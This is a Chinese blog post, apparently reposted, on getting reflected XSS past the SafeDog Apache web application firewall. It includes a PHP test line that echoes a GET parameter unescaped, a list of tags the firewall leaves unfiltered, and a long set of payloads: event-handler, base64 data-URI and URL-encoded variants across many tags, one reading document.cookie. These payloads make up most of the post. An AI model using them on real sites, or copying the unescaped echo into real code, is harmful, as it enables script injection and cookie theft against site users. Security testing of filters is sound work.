内容简介:server 2003+phpstudy+安全狗apache版本v4.0+PHP代码测试代码:先对标签进行测试。
0x00:环境
server 2003+phpstudy+安全狗apache版本v4.0+PHP代码
测试代码:
<?php //XSS反射型漏洞 //1.变量的直接输出 echo $_GET['XSS']; ?>
0x01:标签
先对标签进行测试。
标签:
<script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio> <select>
没有过滤的标签:
<a> <body> <button> <var> <iframe> <object> <keygen> <math> <svg>
0x02:绕过方法
可以弹窗的:alert,prompt ,confirm,base64加密,编码绕过(安全狗都没有过滤)
绕过方法有很多比如:
1.大小写绕过
2.javascript伪协议
3.没有分号
4.Flash
5.HTML5 新标签
6.Fuzz进行测试
7.双层标签绕过
audio标签:
<audio src=x onerror=alert(47)> <audio src=x onerror=prompt(1);> <audio src=1 href=1 onerror="javascript:alert(1)"></audio>
video标签:
<video src=x onerror=prompt(1);> <video src=x onerror=alert(48)>
标签:div
<div style="width:expression(alert(/1/))">1</div> ie浏览器执行 <div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv> url编码绕过
math标签:
<math><a/xlink:href=javascript:prompt(1)>Xss <math href="javascript:javascript:alert(1)">Xss</math>
button标签:
<button onfocus=alert(1) autofocus> <button/onclick=alert(1) >xss</button>
keygen标签:
<keygen/onfocus=prompt(1);> <keygen onfocus=javascript:alert(1) autofocus>
object标签:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg 解码:<script>alert(1)</script>
iframe标签:
<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME> <iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d"> <iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>
以上所述就是小编给大家介绍的《xss绕过安全狗方法》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- WAF绕过的捷径与方法
- 白名单绕过UAC方法原理介绍
- WAF机制及绕过方法总结:注入篇
- 使用Metasploit绕过UAC的多种方法
- 永生之火:相对持久的绕过方法和一点想法
- 新型诈骗花样多,使用多种混淆方法绕过安全检测
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。